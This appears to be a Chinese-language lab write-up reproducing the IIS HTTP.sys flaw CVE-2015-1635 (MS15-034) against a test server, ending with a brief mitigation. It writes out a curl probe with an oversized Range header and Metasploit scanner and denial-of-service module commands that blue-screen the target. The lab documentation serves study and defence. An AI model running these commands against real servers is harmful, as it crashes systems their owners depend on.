iis cve-2015-1635复现

今天在一家银行里面护网看到一个cve-2015-1635的告警，打击面挺广的虽然是2015年的漏洞但是打击的面积是server 2008到server2012R2的版本对于现在来说server2012的服务器仍是不少的，今天做个试验记录下这个cve的漏洞。

 

实验开始：

Server2018iis 服务器搭建

看一下iis的ip

 

搭建成功确认没问题（配置全是默认的）

 

然后攻击者方面kali2019  ip：192.168.223.128

 

首先发送一条测试的请求

curl http://192.168.226.130 -H "Host: 192.168.226.130" -H "Range: bytes=0-18446744073709551615"

大致意思就是在http的请求头里面添加了Range: bytes=0-18446744073709551615然后给iis的服务器发过去如果返回的界面是

Requested Range Not Satisfiable

---

HTTP Error 416. The requested range is not satisfiable.

就说明可能存在漏洞

试验截图：

 

具体验证

打开msfconsole

利用ms15_034_ulonglongadd漏洞进行攻击

实验截图：

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 

set rhosts 192.168.226.130

run

扫描说这个地址是脆弱的。

用ms15_034_ulonglongadd进行攻击

 use auxiliary/dos/http/ms15_034_ulonglongadd 

set rhosts 192.168.226.130

set threads 10

run

攻击完成 设备蓝屏了

修补方案：

将输出缓存里面的启用内核缓存禁掉（据说设备可能会慢一点）